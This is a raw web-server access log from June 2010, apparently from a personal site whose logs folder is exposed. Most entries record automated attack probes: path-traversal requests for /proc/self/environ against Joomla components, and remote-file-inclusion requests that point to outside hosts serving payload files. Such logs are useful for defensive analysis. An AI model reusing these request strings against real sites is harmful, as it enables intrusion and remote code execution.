212.227.248.216 - - [07/Jun/2010:08:57:53 -0500] "GET /index.php?option=com_mtfireeagle&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.805"
207.46.204.178 - - [07/Jun/2010:08:58:06 -0500] "GET /logs/access_log.1168128000 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
94.143.220.3 - - [07/Jun/2010:08:58:48 -0500] "GET /logs//administrator/components/com_jreactions/langset.php?comPath=http://www.blues-in-chedigny.com/baner.txt? HTTP/1.1" 404 341 "-""Mozilla/5.0"
94.143.220.3 - - [07/Jun/2010:08:58:48 -0500] "GET /logs/access_log.1271548800//administrator/components/com_jreactions/langset.php?comPath=http://www.blues-in-chedigny.com/baner.txt? HTTP/1.1" 404 363 "-""Mozilla/5.0"
94.143.220.3 - - [07/Jun/2010:08:58:51 -0500] "GET //administrator/components/com_jreactions/langset.php?comPath=http://www.blues-in-chedigny.com/baner.txt? HTTP/1.1" 404 336 "-""Mozilla/5.0"
212.227.248.216 - - [07/Jun/2010:08:58:53 -0500] "GET /logs/index.php?option=com_mtfireeagle&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.805"
212.227.248.216 - - [07/Jun/2010:08:58:59 -0500] "GET /index.php?option=com_mtfireeagle&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.805"
212.227.248.216 - - [07/Jun/2010:08:58:59 -0500] "GET /logs/access_log.1274832000/*.php?option=com_mtfireeagle&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 316 "-""libwww-perl/5.805"
212.227.248.216 - - [07/Jun/2010:08:59:05 -0500] "GET /*.php?option=com_mtfireeagle&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 289 "-""libwww-perl/5.805"
212.227.248.216 - - [07/Jun/2010:08:59:10 -0500] "GET /logs/*.php?option=com_mtfireeagle&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.805"
212.227.248.216 - - [07/Jun/2010:08:59:32 -0500] "GET /logs/access_log.1274832000/index.php?option=com_mtfireeagle&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.805"
212.227.248.216 - - [07/Jun/2010:08:59:32 -0500] "GET /logs/*.php?option=com_mtfireeagle&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.805"
212.227.248.216 - - [07/Jun/2010:08:59:38 -0500] "GET /index.php?option=com_mtfireeagle&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.805"
212.227.248.216 - - [07/Jun/2010:08:59:38 -0500] "GET /*.php?option=com_mtfireeagle&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 289 "-""libwww-perl/5.805"
212.227.248.216 - - [07/Jun/2010:08:59:43 -0500] "GET /logs/index.php?option=com_mtfireeagle&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.805"
208.75.212.177 - - [07/Jun/2010:09:01:17 -0500] "GET /logs/access_log.1273017600/index.php?option=com_pcchess&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.813"
208.75.212.177 - - [07/Jun/2010:09:01:18 -0500] "GET /index.php?option=com_pcchess&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.813"
208.75.212.177 - - [07/Jun/2010:09:01:19 -0500] "GET /logs/index.php?option=com_pcchess&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.813"
94.143.220.3 - - [07/Jun/2010:09:02:06 -0500] "GET /logs/access_log.1274832000//administrator/components/com_jreactions/langset.php?comPath=http://www.blues-in-chedigny.com/baner.txt? HTTP/1.1" 404 363 "-""Mozilla/5.0"
69.175.14.66 - - [07/Jun/2010:09:03:56 -0500] "GET /logs/components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.alfarrabio.org//nucleus/xmlrpc/fx29id1.txt?? HTTP/1.1" 404 323 "-""Mozilla/5.0"
69.175.14.66 - - [07/Jun/2010:09:03:56 -0500] "GET /components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.alfarrabio.org//nucleus/xmlrpc/fx29id1.txt?? HTTP/1.1" 404 318 "-""Mozilla/5.0"
69.175.14.66 - - [07/Jun/2010:09:03:56 -0500] "GET /logs/access_log.1273363200%20%20/components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.alfarrabio.org//nucleus/xmlrpc/fx29id1.txt?? HTTP/1.1" 404 347 "-""Mozilla/5.0"
69.175.14.66 - - [07/Jun/2010:09:04:32 -0500] "GET /logs/access_log.1274832000%20%20/components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.alfarrabio.org//nucleus/xmlrpc/fx29id1.txt?? HTTP/1.1" 404 347 "-""Mozilla/5.0"
174.121.77.90 - - [07/Jun/2010:09:06:15 -0500] "GET /logs/!ijo../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 355 "-""libwww-perl/5.810"
174.121.77.90 - - [07/Jun/2010:09:06:15 -0500] "GET /!ijo../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 350 "-""libwww-perl/5.810"
217.16.18.219 - - [07/Jun/2010:09:06:23 -0500] "GET /logs/index.php?option=com_webeecomment&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.805"
217.16.18.219 - - [07/Jun/2010:09:06:23 -0500] "GET /index.php?option=com_webeecomment&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.805"
217.16.18.219 - - [07/Jun/2010:09:07:00 -0500] "GET /logs/index.php?option=com_webeecomment&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.805"
217.16.18.219 - - [07/Jun/2010:09:07:00 -0500] "GET /index.php?option=com_webeecomment&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.805"
217.16.18.219 - - [07/Jun/2010:09:07:10 -0500] "GET /logs/index.php?option=com_webeecomment&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.805"
217.16.18.219 - - [07/Jun/2010:09:07:10 -0500] "GET /index.php?option=com_webeecomment&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.805"
195.10.195.196 - - [07/Jun/2010:09:08:48 -0500] "GET /logs//?sourcedir=http://www.wdwinfo.ca/.log HTTP/1.1" 200 8571 "-""libwww-perl/5.813"
195.10.195.196 - - [07/Jun/2010:09:08:48 -0500] "GET //?sourcedir=http://www.wdwinfo.ca/.log HTTP/1.1" 200 1003 "-""libwww-perl/5.813"
174.121.77.90 - - [07/Jun/2010:09:08:58 -0500] "GET /!ijo../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 350 "-""libwww-perl/5.810"
114.200.199.236 - - [07/Jun/2010:09:09:25 -0500] "GET /logs/access_log.1271548800//config/dbutil.bck.php?confdir=http://www.kangnung.org//zb//s1.txt? HTTP/1.1" 404 333 "-""Mozilla/5.0"
114.200.199.236 - - [07/Jun/2010:09:09:25 -0500] "GET //config/dbutil.bck.php?confdir=http://www.kangnung.org//zb//s1.txt? HTTP/1.1" 404 306 "-""Mozilla/5.0"
114.200.199.236 - - [07/Jun/2010:09:09:26 -0500] "GET /logs//config/dbutil.bck.php?confdir=http://www.kangnung.org//zb//s1.txt? HTTP/1.1" 404 311 "-""Mozilla/5.0"
217.16.18.219 - - [07/Jun/2010:09:09:26 -0500] "GET /logs/index.php?option=com_webeecomment&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.805"
217.16.18.219 - - [07/Jun/2010:09:09:26 -0500] "GET /index.php?option=com_webeecomment&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.805"
92.48.207.112 - - [07/Jun/2010:09:10:40 -0500] "GET /logs/access_log.1263081600//components/com_flyspray/startdown.php?file=http://tjdhosp.co.kr/data/session/byz9991.txt??? HTTP/1.1" 404 349 "-""Mozilla/5.0"
69.175.14.66 - - [07/Jun/2010:09:11:26 -0500] "GET /logs/access_log.1273363200/components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.alfarrabio.org//nucleus/xmlrpc/fx29id1.txt?? HTTP/1.1" 404 345 "-""Mozilla/5.0"
69.175.14.66 - - [07/Jun/2010:09:11:44 -0500] "GET /logs/access_log.1274832000/components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.alfarrabio.org//nucleus/xmlrpc/fx29id1.txt?? HTTP/1.1" 404 345 "-""Mozilla/5.0"
67.195.112.180 - - [07/Jun/2010:09:12:23 -0500] "GET /costume/costume1.htm HTTP/1.0" 304 - "-""Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
93.89.215.70 - - [07/Jun/2010:09:13:30 -0500] "GET /?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 1003 "-""libwww-perl/5.805"
174.121.77.90 - - [07/Jun/2010:09:17:15 -0500] "GET /logs/access_log.1274313600/!ijo../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 377 "-""libwww-perl/5.810"
174.121.77.90 - - [07/Jun/2010:09:17:15 -0500] "GET /!ijo../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 350 "-""libwww-perl/5.810"
174.121.77.90 - - [07/Jun/2010:09:17:15 -0500] "GET /logs/!ijo../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 355 "-""libwww-perl/5.810"
72.18.137.210 - - [07/Jun/2010:09:18:43 -0500] "GET //components/com_fabrik/libs/Blowfish/CBC.php?mosConfig_absolute_path=http://www.dongriver.com/zboard/data/dongriver_gallery/1.pdf??? HTTP/1.1" 404 328 "-""Mozilla/5.0"
72.18.137.210 - - [07/Jun/2010:09:18:43 -0500] "GET /logs//components/com_fabrik/libs/Blowfish/CBC.php?mosConfig_absolute_path=http://www.dongriver.com/zboard/data/dongriver_gallery/1.pdf??? HTTP/1.1" 404 333 "-""Mozilla/5.0"
72.18.137.210 - - [07/Jun/2010:09:18:43 -0500] "GET /logs/access_log.1271548800//components/com_fabrik/libs/Blowfish/CBC.php?mosConfig_absolute_path=http://www.dongriver.com/zboard/data/dongriver_gallery/1.pdf??? HTTP/1.1" 404 355 "-""Mozilla/5.0"
72.18.137.210 - - [07/Jun/2010:09:18:43 -0500] "GET /logs/access_log.1271462400//components/com_fabrik/libs/Blowfish/CBC.php?mosConfig_absolute_path=http://www.dongriver.com/zboard/data/dongriver_gallery/1.pdf??? HTTP/1.1" 404 355 "-""Mozilla/5.0"
72.18.137.210 - - [07/Jun/2010:09:18:44 -0500] "GET //components/com_fabrik/libs/Blowfish/CBC.php?mosConfig_absolute_path=http://www.dongriver.com/zboard/data/dongriver_gallery/1.pdf??? HTTP/1.1" 404 328 "-""Mozilla/5.0"
72.18.137.210 - - [07/Jun/2010:09:18:44 -0500] "GET /logs//components/com_fabrik/libs/Blowfish/CBC.php?mosConfig_absolute_path=http://www.dongriver.com/zboard/data/dongriver_gallery/1.pdf??? HTTP/1.1" 404 333 "-""Mozilla/5.0"
72.18.137.210 - - [07/Jun/2010:09:18:44 -0500] "GET /logs/access_log.1271548800//components/com_fabrik/libs/Blowfish/CBC.php?mosConfig_absolute_path=http://www.dongriver.com/zboard/data/dongriver_gallery/1.pdf??? HTTP/1.1" 404 355 "-""Mozilla/5.0"
72.18.137.210 - - [07/Jun/2010:09:18:44 -0500] "GET /logs/access_log.1271462400//components/com_fabrik/libs/Blowfish/CBC.php?mosConfig_absolute_path=http://www.dongriver.com/zboard/data/dongriver_gallery/1.pdf??? HTTP/1.1" 404 355 "-""Mozilla/5.0"
187.45.193.159 - - [07/Jun/2010:09:22:49 -0500] "GET /logs/index.php?option=com_jeformcr&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.805"
187.45.193.159 - - [07/Jun/2010:09:22:50 -0500] "GET /index.php?option=com_jeformcr&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.805"
109.71.41.45 - - [07/Jun/2010:09:22:55 -0500] "GET //index2.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 295 "-""libwww-perl/5.823"
72.18.137.210 - - [07/Jun/2010:09:25:56 -0500] "GET //modules/TotalCalendar/about.php?inc_dir=http://www.dongriver.com/zboard/data/dongriver_gallery/1.pdf??? HTTP/1.1" 404 316 "-""Mozilla/5.0"
72.18.137.210 - - [07/Jun/2010:09:25:56 -0500] "GET /logs//modules/TotalCalendar/about.php?inc_dir=http://www.dongriver.com/zboard/data/dongriver_gallery/1.pdf??? HTTP/1.1" 404 321 "-""Mozilla/5.0"
72.18.137.210 - - [07/Jun/2010:09:25:56 -0500] "GET /logs/access_log.1271548800//modules/TotalCalendar/about.php?inc_dir=http://www.dongriver.com/zboard/data/dongriver_gallery/1.pdf??? HTTP/1.1" 404 343 "-""Mozilla/5.0"
72.18.137.210 - - [07/Jun/2010:09:26:15 -0500] "GET //modules/TotalCalendar/about.php?inc_dir=http://www.dongriver.com/zboard/data/dongriver_gallery/1.pdf??? HTTP/1.1" 404 316 "-""Mozilla/5.0"
72.18.137.210 - - [07/Jun/2010:09:26:15 -0500] "GET /logs//modules/TotalCalendar/about.php?inc_dir=http://www.dongriver.com/zboard/data/dongriver_gallery/1.pdf??? HTTP/1.1" 404 321 "-""Mozilla/5.0"
72.18.137.210 - - [07/Jun/2010:09:26:15 -0500] "GET /logs/access_log.1271548800//modules/TotalCalendar/about.php?inc_dir=http://www.dongriver.com/zboard/data/dongriver_gallery/1.pdf??? HTTP/1.1" 404 343 "-""Mozilla/5.0"
216.18.219.98 - - [07/Jun/2010:09:27:18 -0500] "GET /logs/access_log.1271721600 HTTP/1.1" 200 586690 "http://tomdolan.pconline.com/logs/access_log.1271721600""Opera/9.00 (Windows NT 5.1; U; en)"
72.18.137.210 - - [07/Jun/2010:09:28:21 -0500] "GET /logs/access_log.1238803200%20%20//modules/TotalCalendar/about.php?inc_dir=http://www.dongriver.com/zboard/data/dongriver_gallery/1.pdf??? HTTP/1.1" 404 345 "-""Mozilla/5.0"
72.18.137.210 - - [07/Jun/2010:09:28:21 -0500] "GET /logs//modules/TotalCalendar/about.php?inc_dir=http://www.dongriver.com/zboard/data/dongriver_gallery/1.pdf??? HTTP/1.1" 404 321 "-""Mozilla/5.0"
72.18.137.210 - - [07/Jun/2010:09:28:21 -0500] "GET //modules/TotalCalendar/about.php?inc_dir=http://www.dongriver.com/zboard/data/dongriver_gallery/1.pdf??? HTTP/1.1" 404 316 "-""Mozilla/5.0"
72.18.137.210 - - [07/Jun/2010:09:28:22 -0500] "GET /logs//modules/TotalCalendar/about.php?inc_dir=http://www.dongriver.com/zboard/data/dongriver_gallery/1.pdf??? HTTP/1.1" 404 321 "-""Mozilla/5.0"
72.18.137.210 - - [07/Jun/2010:09:28:22 -0500] "GET //modules/TotalCalendar/about.php?inc_dir=http://www.dongriver.com/zboard/data/dongriver_gallery/1.pdf??? HTTP/1.1" 404 316 "-""Mozilla/5.0"
72.18.137.210 - - [07/Jun/2010:09:28:22 -0500] "GET /logs/access_log.1238803200%20%20//modules/TotalCalendar/about.php?inc_dir=http://www.dongriver.com/zboard/data/dongriver_gallery/1.pdf??? HTTP/1.1" 404 345 "-""Mozilla/5.0"
93.89.215.70 - - [07/Jun/2010:09:30:37 -0500] "GET /logs/access_log.1274313600/?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 311 "-""libwww-perl/5.805"
93.89.215.70 - - [07/Jun/2010:09:30:38 -0500] "GET /?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 1003 "-""libwww-perl/5.805"
93.89.215.70 - - [07/Jun/2010:09:30:38 -0500] "GET /logs/?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 8566 "-""libwww-perl/5.805"
87.219.93.190 - - [07/Jun/2010:09:31:28 -0500] "GET /favicon.ico HTTP/1.1" 404 295 "-""Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.6; es-ES; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3 GTB7.0"
207.46.195.241 - - [07/Jun/2010:09:39:06 -0500] "GET /artwork/trunks.htm HTTP/1.1" 304 - "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
217.16.18.219 - - [07/Jun/2010:09:39:48 -0500] "GET /logs/index.php?option=com_dwgraphs&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.805"
217.16.18.219 - - [07/Jun/2010:09:39:48 -0500] "GET /index.php?option=com_dwgraphs&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.805"
88.191.94.188 - - [07/Jun/2010:09:42:13 -0500] "GET /logs/index.php?option=com_jeformcr&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.805"
88.191.94.188 - - [07/Jun/2010:09:42:13 -0500] "GET /index.php?option=com_jeformcr&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.805"
88.191.94.188 - - [07/Jun/2010:09:42:18 -0500] "GET /logs/index.php?option=com_jeformcr&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.805"
88.191.94.188 - - [07/Jun/2010:09:42:18 -0500] "GET /index.php?option=com_jeformcr&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.805"
207.46.195.240 - - [07/Jun/2010:09:42:36 -0500] "GET /logs/access_log.1167264000 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
187.45.193.159 - - [07/Jun/2010:09:42:50 -0500] "GET /logs/index.php?option=com_weberpcustomer&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.805"
187.45.193.159 - - [07/Jun/2010:09:42:50 -0500] "GET /index.php?option=com_weberpcustomer&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.805"
212.174.28.46 - - [07/Jun/2010:09:45:00 -0500] "GET //components/com_fabrik/libs/Blowfish/CBC.php?mosConfig_absolute_path=http://tjdhosp.co.kr/data/session/byz9991.txt??? HTTP/1.1" 404 328 "-""Mozilla/5.0"
212.174.28.46 - - [07/Jun/2010:09:45:00 -0500] "GET /logs//components/com_fabrik/libs/Blowfish/CBC.php?mosConfig_absolute_path=http://tjdhosp.co.kr/data/session/byz9991.txt??? HTTP/1.1" 404 333 "-""Mozilla/5.0"
212.174.28.46 - - [07/Jun/2010:09:45:10 -0500] "GET /logs/access_log.1273363200//components/com_fabrik/libs/Blowfish/CBC.php?mosConfig_absolute_path=http://tjdhosp.co.kr/data/session/byz9991.txt??? HTTP/1.1" 404 355 "-""Mozilla/5.0"
217.16.18.219 - - [07/Jun/2010:09:47:02 -0500] "GET /logs/access_log.1274832000/index.php?option=com_dwgraphs&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.805"
217.16.18.219 - - [07/Jun/2010:09:47:02 -0500] "GET /index.php?option=com_dwgraphs&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.805"
217.16.18.219 - - [07/Jun/2010:09:47:02 -0500] "GET /logs/index.php?option=com_dwgraphs&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.805"
187.45.193.159 - - [07/Jun/2010:09:48:34 -0500] "GET /logs/index.php?option=com_wisroyq&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.805"
187.45.193.159 - - [07/Jun/2010:09:48:35 -0500] "GET /index.php?option=com_wisroyq&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.805"
187.45.193.159 - - [07/Jun/2010:09:50:00 -0500] "GET /logs/access_log.1274832000/index.php?option=com_weberpcustomer&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.805"
187.45.193.159 - - [07/Jun/2010:09:50:01 -0500] "GET /index.php?option=com_weberpcustomer&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.805"
187.45.193.159 - - [07/Jun/2010:09:50:01 -0500] "GET /logs/index.php?option=com_weberpcustomer&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.805"
207.46.199.180 - - [07/Jun/2010:09:52:54 -0500] "GET /robots.txt HTTP/1.1" 404 294 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
87.253.162.10 - - [07/Jun/2010:09:55:38 -0500] "GET /logs//atom.php5?page=http://www.babywaves.com//a/pid?? HTTP/1.1" 404 299 "-""Mozilla/5.0"
87.253.162.10 - - [07/Jun/2010:09:55:39 -0500] "GET /logs/access_log.1271548800//atom.php5?page=http://www.babywaves.com//a/pid?? HTTP/1.1" 404 321 "-""Mozilla/5.0"
87.253.162.10 - - [07/Jun/2010:09:55:39 -0500] "GET //atom.php5?page=http://www.babywaves.com//a/pid?? HTTP/1.1" 404 294 "-""Mozilla/5.0"
220.181.7.28 - - [07/Jun/2010:09:56:17 -0500] "GET /costume/costume2.htm HTTP/1.1" 200 1799 "-""Baiduspider+(+http://www.baidu.com/search/spider.htm)"
81.23.236.82 - - [07/Jun/2010:09:58:53 -0500] "GET /logs/*.php?option=com_mtfireeagle&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.805"
81.23.236.82 - - [07/Jun/2010:09:58:53 -0500] "GET /*.php?option=com_mtfireeagle&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 289 "-""libwww-perl/5.805"
76.73.79.61 - - [07/Jun/2010:09:58:59 -0500] "GET /logs/*.php?option=com_mtfireeagle&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.810"
76.73.79.61 - - [07/Jun/2010:09:58:59 -0500] "GET /*.php?option=com_mtfireeagle&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 289 "-""libwww-perl/5.810"
76.73.79.61 - - [07/Jun/2010:09:59:04 -0500] "GET /logs/*.php?option=com_mtfireeagle&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.810"
76.73.79.61 - - [07/Jun/2010:09:59:05 -0500] "GET /*.php?option=com_mtfireeagle&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 289 "-""libwww-perl/5.810"
188.72.70.56 - - [07/Jun/2010:10:04:39 -0500] "GET /logs/?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 8566 "-""libwww-perl/5.834"
188.72.70.56 - - [07/Jun/2010:10:04:40 -0500] "GET /?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 1003 "-""libwww-perl/5.834"
188.72.70.56 - - [07/Jun/2010:10:04:50 -0500] "GET /logs/?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 8566 "-""libwww-perl/5.834"
188.72.70.56 - - [07/Jun/2010:10:04:50 -0500] "GET /?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 1003 "-""libwww-perl/5.834"
217.16.18.219 - - [07/Jun/2010:10:06:00 -0500] "GET /logs/index.php?option=com_ccnewsletter&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.805"
217.16.18.219 - - [07/Jun/2010:10:06:00 -0500] "GET /logs/index.php?option=com_ccnewsletter&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.805"
217.16.18.219 - - [07/Jun/2010:10:06:00 -0500] "GET /index.php?option=com_ccnewsletter&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.805"
217.16.18.219 - - [07/Jun/2010:10:06:00 -0500] "GET /index.php?option=com_ccnewsletter&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.805"
217.16.18.219 - - [07/Jun/2010:10:06:29 -0500] "GET /logs/index.php?option=com_ccnewsletter&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.805"
217.16.18.219 - - [07/Jun/2010:10:06:30 -0500] "GET /index.php?option=com_ccnewsletter&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.805"
207.46.13.44 - - [07/Jun/2010:10:06:36 -0500] "GET /logs/access_log.1192320000 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
187.45.193.159 - - [07/Jun/2010:10:06:47 -0500] "GET /logs/index.php?option=com_joomlaflashfun&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.805"
